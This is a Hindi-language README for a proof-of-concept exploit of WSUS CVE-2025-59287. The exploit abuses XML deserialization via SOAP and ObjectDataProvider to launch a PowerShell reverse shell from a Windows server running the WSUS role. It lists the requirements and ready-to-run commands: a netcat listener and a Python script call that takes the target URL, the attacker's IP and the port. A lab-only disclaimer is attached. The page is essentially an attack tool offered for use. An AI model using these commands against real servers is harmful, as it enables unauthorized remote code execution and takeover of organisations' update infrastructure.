
WSUS CVE-2025-59287 के लिए PoC एक्सप्लॉइट, जो XML डिसीरियलाइज़ेशन का उपयोग करके SOAP और ObjectDataProvider के माध्यम से Windows रिवर्स शेल प्राप्त करता है।
WSUS CVE-2025-59287 – XML डिसीरियलाइज़ेशन RCE (रिवर्स शेल) WSUS CVE-2025-59287 का शोषण करने के लिए एक केंद्रित PoC, जो XML डिसीरियलाइज़ेशन के माध्यम से Windows रिवर्स शेल प्राप्त करता है। यह स्क्रिप्ट केवल रिवर्स शेल पेलोड का समर्थन करती है (कोई calc फ़ॉलबैक नहीं)। लक्ष्य: WSUS भूमिका वाला Windows सर्वर तकनीक: SOAP + ObjectDataProvider डिसीरियलाइज़ेशन परिणाम: cmd.exe आपके लिसनर के लिए PowerShell रिवर्स शेल लॉन्च करता है अस्वीकरण केवल प्रयोगशाला वातावरण में अधिकृत परीक्षण के लिए। सभी लागू कानूनों का पालन करने की जिम्मेदारी आपकी है। आवश्यकताएँ Python 3.x WSUS एंडपॉइंट्स तक नेटवर्क पहुँच (आमतौर पर 8530/8531) आपकी मशीन पर लिसनर (जैसे, nc)
nc -lvnp 4444
python3 my-CVE-2025-59287.py -u http://TARGET:8531 -l YOUR_IP -p 4444 --debug
-u: WSUS आधार URL (http/https, आमतौर पर पोर्ट 8530/8531) -l: शेल प्राप्त करने के लिए आपका IP -p: आपका लिसनर पोर्ट --debug: विस्तृत आउटपुट